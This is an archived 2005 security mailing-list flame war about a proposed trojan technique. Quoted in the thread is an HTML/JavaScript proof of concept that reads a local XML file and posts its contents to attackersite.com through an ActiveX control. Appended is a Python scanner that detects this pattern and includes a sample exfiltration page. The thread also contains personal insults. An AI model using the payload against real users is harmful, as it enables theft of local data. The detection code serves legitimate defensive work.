Date: Thu Dec 22 18:06:58 2005
From: testdrive6 at gmail.com (Test Drive)
Subject: new attack technique? using JavaScript+XML+OWSPost Data

On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
>
> You surely must be a clone of Gaurav !! Ain't you ??
>
> name pipe [mailto:namepipe@...il.com] brazenly wrote:
>
>> Before flaming others just look at urself. wtf u do moron debasis ,
>> sell nessus reports for 5K, without even removing false +ives ??
>
> lol !! Is that what you do ??
>
No u do that .. everone knows abt it.

>> This is ur elite resume ->
>> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
>> Hacker ???? omfg.
>
> Certainly, like many others I was also one time looking for a good break
> and moreover I just wanted to have a web based copy on a security jobs
> site. I am glad that my resume made you laugh.
>
>> You trying to be next fadia or wat ?
>
> I never have to become like someone else.... I'm pretty much happy with my
> own identity.
>
>> Do you want me to post ur lame Firewall bypass vulnerabilities links
>> which have been already founded years before?
>
> Is that the one that one, which many securitysites released as an advisory
> including the vendor himself. Why you, infact I wud be glad to post it
> again.
> http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
>
> Also don't forget to refer those CVE, BID, FrSIRT, OSVDB, Secunia,
> Securiteam, ISS X-Force, US-CERT reference link on my site. They might help
> you clarify your doubt.
>
Are u talking abt the WGA check, which some1 posted abt 2 week ago.

>> Basically u are an asshole. So stfu.
>
> *****STFU**** Is this statement phrased using both gaurav's and ur's l33t skils?? :P
>
> - D
>
> ------------------------------
> *From:* name pipe [mailto:namepipe@...il.com]
> *Sent:* Thursday, December 22, 2005 10:54 PM
> *To:* Debasis Mohanty
> *Cc:* Gaurav Kumar; full-disclosure@...ts.grok.org.uk
> *Subject:* Re: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
>
> Before flaming others just look at urself. wtf u do moron debasis , sell
> nessus reports for 5K, without even removing false +ives ??
> This is ur elite resume ->
> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
> Hacker ???? omfg. You trying to be next fadia or wat ? Do you want me to
> post ur lame Firewall bypass vulnerabilities links which have been already
> founded years before?
>
> Basically u are an asshole. So stfu.
>
> On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> >
> > Keep it up moron !!
> >
> > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> > > kidder than u)
> >
> > Shit !! Another several years ppl has to tolerate your stupidity till
> > you actuall _grow up_.
> >
> > > Tell me one thing, a Windows XP + Offfice XP + Internet explorer
> > > combination so rare ?
> >
> > Is this a new topic ?? I mean are you done with your firewall and some
> > weired trojan design :P
> >
> > - D
> >
> > -----Original Message-----
> > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of Gaurav
> > Kumar
> > Sent: Thursday, December 22, 2005 10:23 PM
> > To: Debasis Mohanty
> > Cc: full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] new attack technique? using
> > JavaScript+XML+OWSPost Data
> >
> > typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.
> >
> > On 12/22/05, Gaurav Kumar <gaurav@...urebox.org> wrote:
> > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> > > kidder than u)
> > >
> > > The _real_ thing is that I proved the point.
> > > U told win xp will give access denied error. I proved u wrong with the
> > > proof attached.
> > > U told above technique wont work...i proved u wrong.
> > > Tell me one thing, a Windows XP + Offfice XP + Internet explorer
> > > combination so rare ?
> > >
> > > Is that all making ur ego shattered?
> > >
> > > ...and u are no one to decide what should one disuss on this list.
> > >
> > > regards,
> > > gaurav
> > >
> > > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > > > Kid,
> > > > Although I normally don't reply to such frivilous and lame
> > > > statements but your reply has seriously piss me off.. So dropping
> > > > few lines, perhaps will help you grow up !!
> > > >
> > > > -----Original Message-----
> > > > >> From: Gaurav Kumar brazenly wrote:
> > > >
> > > > >> Looks like u need to read again what i wrote. I didnt use the
> > > > >> word 'spread'.
> > > >
> > > > I don't have to !! I can still remember your priceless statements
> > > > [1] + [2] -
> > > >
> > > > [1] A Trojan has been to be placed in a system running an
> > > > [1] application firewall like Zone Alarm Pro etc.
> > > >
> > > > [2] The target system must be having office XP and the user has to
> > > > [2] be lured to view a webpage hosted by attacker.
> > > >
> > > > ROFL !! May be you could just ask your l33t victim to send you his
> > > > passwords and other info by email :P Don't forget to send him your
> > > > l33t email ID - '@ securebox.org'
> > > >
> > > > >> [3] Moreover, u need not know if the target system is running ZA
> > > > >> or not...
> > > > >> [3] "the technique works even if firewall is not installed".
> > > >
> > > > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt
> > > > >> matter is ZA
> > > > >> [4] or any other FW is running on client".
> > > >
> > > > Looking at statement [3] & [4], (especially the statement within
> > > > double quotes) just made me believe that you don't know what your are
> > > > talking about unless you want to look like an idiot.
> > > >
> > > > >> really? ever heard of IE exploits?
> > > >
> > > > Priceless !!
> > > >
> > > > >> Well..Exactly! i would suggest u read the 'assumptions' first,
> > > > >> its an assumption that user will click yes to warning...like most
> > > > >> 'normal' users do.
> > > >
> > > > Yet another priceless statement... Maybe you could just ask your
> > > > l33t victim to click 'yes' to your l33t piece of code trying to
> > > > download some l33t piece of shit which will fail to run and die like
> > > > an idiot.
> > > >
> > > > I am sure you have enough l33t skills to strick back to keep your
> > > > ego up2date however, I wud rather suggest if you have only your
> > > > stupidity to share then feel free to take it offline and don't piss
> > > > off everyone in this list. I would welcome you if you really want to
> > > > strike back with some _serious_ technical stuff. (Note: make a note
> > > > of _serious_ in the statement)
> > > >
> > > > - D
> > > >
> > > > -----Original Message-----
> > > > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of
> > > > Gaurav Kumar
> > > > Sent: Thursday, December 22, 2005 8:52 AM
> > > > To: Debasis Mohanty
> > > > Cc: full-disclosure@...ts.grok.org.uk; websecurity@...appsec.org
> > > > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack
> > > > technique? using JavaScript+XML+OWSPost Data
> > > >
> > > > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > > > > -----Original Message-----
> > > > > From: Gaurav Kumar
> > > > > Sent: Wednesday, December 21, 2005 8:59 PM
> > > > > To: full-disclosure@...ts.grok.org.uk
> > > > > Cc: websecurity@...appsec.org
> > > > > Subject: [Full-disclosure] new attack technique? using
> > > > > JavaScript+XML+OWSPost Data
> > > > >
> > > > > 1>> A Trojan has been to be placed in a system running an
> > > > > 1>> application firewall like Zone Alarm Pro etc.
> > > > >
> > > > > >> Assumptions:
> > > > >
> > > > > 2>> The target system must be having office XP and the user has to
> > > > > 2>> be lured to view a webpage hosted by attacker.
> > > > >
> > > > > 3>> The Trojan can be designed to generate an xml file which will
> > > > > 3>> contain the data to be sent out. The attacker will lure the
> > > > > 3>> user to visit a website hosted by him.
> > > > >
> > > > > Lol !! In a practical scenario, the attacker who spreads the
> > > > > worm/trojans himself is not aware in the initial stage which are
> > > > > the infected machines unless the trojan sends back the
> > > > > machine/user info back to the attacker. Now as you have already
> > > > > mentioned ZA is running then no data can be sent back to the
> > > > > attacker. So the attacker is clueless which are those infected
> > > > > machines.
> > > >
> > > > Looks like u need to read again what i wrote. I didnt use the word
> > > > 'spread'.
> > > > Moreover, u need not know if the target system is running ZA or
> > > > not...the technique works even if firewall is not installed. I am
> > > > discussing a possible 'design' of a trojan here, doesnt matter is ZA
> > > > or any other FW is running on client.
> > > >
> > > > > So the case of luring the user to visit the link is out of
> > > > > scope...
> > > >
> > > > really? ever heard of IE exploits?
> > > >
> > > > >> The site can have following HTML code-
> > > > >
> > > > > Now coming back to technical stuff, You are trying to access a
> > > > > local file which will only be allowed if the site is in "Trusted
> > > > > Sites" or "Local Intranet" or "Local Security Zone" and activex
> > > > > not marked safe.
> > > > > The fact that *the client is also the server* is irrelevant.
> > > > >
> > > > > Try uploading the script to some webserver and give a html
> > > > > extention; it will throw an _access denied_ error when the page
> > > > > loads (even on Win XP + SP1).
> > > > >
> > > > > In case of any server side extention like *.asp, *.jsp etc, the
> > > > > user will be prompted that an malicious component is trying to
> > > > > load and ask for user permission.
> > > > >
> > > > > >> <html>
> > > > > >> <body>
> > > > > >> The author is not responsible for any misuse, this PoC is for
> > > > > >> educational purpose only.
> > > > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > > > >> id="exp">
> > > > > >> </object>
> > > > > >> <script LANGUAGE=javascript>
> > > > > >> var xmlDoc
> > > > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > > > >> xmlDoc.async=false ;
> > > > > >> xmlDoc.load("c:\\note.xml");
> > > > > >> xmlObj=xmlDoc.documentElement;
> > > > > >> var a= xmlObj.firstChild.text;
> > > > > >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > > > > >> </script>
> > > > > >> </body>
> > > > > >> </html>
> > > > >
> > > > > >> The above code (works well on windows XP SP2) essentials calls
> > > > > >> "OWS Post Data" COM control to post the contents of note.xml
> > > > > >> (generated by trojan) to attackersite.com
> > > > >
> > > > > IMHO, never conduct such tests in a "Intranet Zone" or "Local
> > > > > Zone" and draw conclusion about "Internet Security Zone".
> > > > >
> > > > > You may also link to know about this issue -
> > > > > http://support.microsoft.com/kb/317244/EN-US/
> > > > >
> > > > > >>> Essentially, the technique is breaking the basic functionality
> > > > > >>> of application firewalls by using OWS Post Data as bridge for
> > > > > >>> sending out the data using Javascript and XML.
> > > > >
> > > > > Not Exactly !! I wud rather suggest you to do a little more
> > > > > research and draw any conclusion. Keep those _Security Zones_ in
> > > > > mind before you post anything...
> > > >
> > > > Well..Exactly! i would suggest u read the 'assumptions' first, its
> > > > an assumption that user will click yes to warning...like most
> > > > 'normal' users do.
> > > >
> > > > - D
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
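The technical point buried in the thread is a detection question for a defender: a page served from the Internet zone that instantiates a known COM control, reads a local file through MSXML from script, and hands the result to that control's Post() method is a pattern worth flagging in proxied or archived HTML, regardless of whether IE's zone checks or an "ActiveX not marked safe" prompt would have stopped it on a given client. The scanner below is an added example and is not code from any participant in the thread. The CLSID on its watch-list is the one quoted in the PoC above; the sample pages, the collector host `collector.example.invalid`, and the three-tier verdict rule are this example's own constructions.

```python
"""Static scanner for the ActiveX + MSXML local-file + Post() pattern.

Added example, not code from the thread. Flags HTML that (a) embeds a
watch-listed ActiveX control, (b) loads a local file (drive-letter path
or file: URL) through a script-created XML DOM, and (c) passes data to a
Post() call. Sample pages below are constructed for the example.
"""
import re

# Watch-list keyed by CLSID. The entry is the control quoted in the thread's PoC.
WATCHED_CLSIDS = {
    "BDEADE98-C265-11D0-BCED-00A0C90AB50F": "OWS Post Data control",
}

GUID = r'[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}'
OBJECT_RE = re.compile(r'<object[^>]*classid\s*=\s*["\']?clsid:\{?(' + GUID + r')', re.I)
ACTIVEX_RE = re.compile(r'new\s+ActiveXObject\s*\(\s*["\']([^"\']+)["\']', re.I)
# .load() whose argument is a drive-letter path (one or more backslashes) or a file: URL.
LOCAL_LOAD_RE = re.compile(r'\.load\s*\(\s*["\']((?:[A-Za-z]:\\+|file:)[^"\']*)["\']', re.I)
# .Post(<anything>, "<url>", ...) : capture the URL, tolerating stray whitespace.
POST_RE = re.compile(r'\.Post\s*\(\s*[^,]*,\s*["\']\s*([^"\']+?)\s*["\']', re.I)


def scan_html(html: str) -> dict:
    """Return the indicators found in one HTML document plus a verdict string."""
    clsids = [c.upper() for c in OBJECT_RE.findall(html)]
    watched = [c for c in clsids if c in WATCHED_CLSIDS]
    activex = ACTIVEX_RE.findall(html)
    local_loads = LOCAL_LOAD_RE.findall(html)
    posts = POST_RE.findall(html)

    # Verdict rule (this example's own): local read feeding a Post() is the
    # full exfiltration shape; a watched control or a lone local read is
    # suspicious; anything else is left alone.
    if local_loads and posts:
        verdict = "local-file-exfiltration"
    elif watched or local_loads:
        verdict = "suspicious"
    else:
        verdict = "clean"

    return {
        "clsids": clsids,
        "watched": [(c, WATCHED_CLSIDS[c]) for c in watched],
        "activex": activex,
        "local_loads": local_loads,
        "posts": posts,
        "verdict": verdict,
    }


# Constructed sample: the shape of the quoted PoC, with a placeholder collector host.
SUSPECT_PAGE = r'''<html><body>
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"></object>
<script LANGUAGE=javascript>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = false;
xmlDoc.load("c:\\note.xml");
var a = xmlDoc.documentElement.firstChild.text;
exp.Post(0, "http://collector.example.invalid/input.asp", a);
</script></body></html>'''

# Constructed sample: ordinary page using MSXML against a same-site resource only.
BENIGN_PAGE = r'''<html><body>
<script LANGUAGE=javascript>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = false;
xmlDoc.load("data/catalog.xml");
</script></body></html>'''


if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        result = scan_html(page)
        print(f"{name}: {result['verdict']}")
        for key in ("watched", "activex", "local_loads", "posts"):
            if result[key]:
                print(f"  {key}: {result[key]}")
```

The benign page deliberately still uses `ActiveXObject("Microsoft.XMLDOM")`, which was routine in 2005-era sites; the scanner only escalates when the load target is a local path or file: URL, so MSXML use alone does not generate noise. Extending the watch-list with further CLSIDs, or feeding the scanner from a proxy cache, is the obvious next step.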